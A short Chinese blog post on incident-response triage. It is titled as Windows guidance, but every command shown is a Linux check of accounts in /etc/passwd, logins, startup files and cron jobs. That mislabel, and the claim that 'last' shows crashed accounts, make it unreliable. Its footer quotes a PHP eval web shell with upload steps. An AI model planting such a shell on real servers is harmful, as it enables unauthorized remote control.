当前位置:首页 > 网络攻防 > 正文内容

Windows应急响应基础技能

canca1年前 (2024-09-01)网络攻防340

Windows应急响应基础技能

  1. 系统信息排查

    利用命令lscpu查看CPU信息

    利用命令uname -a查看系统版本信息

    输入awk -F: '{if($3==0)print$1}' /etc/passwd查看特权账户,awk -F: '{if(length($2)==0)print$1}' /etc/passwd查看无密码登陆账号,cat /etc/passwd | grep '/bin'查看了登陆账号

    利用命令last查看曾经crash的账户

    查看etc目录,可以看到rc.local自启文件,cat查看 (ls /etc | grep rc)

    crontab -l查看计划任务


扫描二维码推送至手机访问。

版权声明:本文由Ant.Master's Blog发布,如需转载请注明出处。

本文链接:https://iant.work/post/886.html

分享给朋友:
返回列表

上一篇:AntSword教程

没有最新的文章了...

“Windows应急响应基础技能” 的相关文章

AntSword教程

<?php @eval($_POST[cmd]);?>1.php服务器上传病毒文件1.php2.打开AntSword.exe,选择文件库antSword-master3.数据管理,添加数据...

发表评论

访客

◎欢迎参与讨论,请在这里发表您的看法和观点。